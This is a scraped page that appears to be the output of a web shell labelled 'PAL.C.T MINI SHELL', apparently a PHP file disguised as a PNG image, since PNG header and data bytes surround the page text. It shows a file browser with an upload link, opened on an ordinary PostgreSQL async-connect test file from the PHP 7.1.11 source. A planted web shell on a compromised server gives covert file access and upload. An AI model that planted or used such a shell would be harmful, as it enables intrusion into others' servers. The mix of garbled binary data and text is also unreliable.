php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /php-7.1.11/ext/pgsql/tests/
upload
files >> //php-7.1.11/ext/pgsql/tests/29nb_async_connect.phpt

--TEST--
PostgreSQL non-blocking async connect
--SKIPIF--
<?php
include("skipif.inc");
?>
--FILE--
<?php

include('config.inc');
include('nonblocking.inc');

if (!$db = pg_connect($conn_str, PGSQL_CONNECT_ASYNC)) {
	die("pg_connect() error");
} elseif (pg_connection_status($db) === PGSQL_CONNECTION_BAD) {
	die("pg_connect() error");
} elseif ($db_socket = pg_socket($db)) {
	stream_set_blocking($db_socket, FALSE);
} else {
	die("pg_socket() error");
}

while (TRUE) {
	switch ($status = pg_connect_poll($db)) {
		case PGSQL_POLLING_READING:
			if (nb_is_readable($db_socket)) { break 2; }
			break;
		case PGSQL_POLLING_WRITING:
			if (nb_is_writable($db_socket)) { break 2; }
			break;
		case PGSQL_POLLING_FAILED:
			die("async connection failed");
		case PGSQL_POLLING_OK:
			break 2;
	}
}
assert(pg_connection_status($db) === PGSQL_CONNECTION_MADE);
echo "OK";

pg_close($db);

?>
--EXPECT--
OK
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`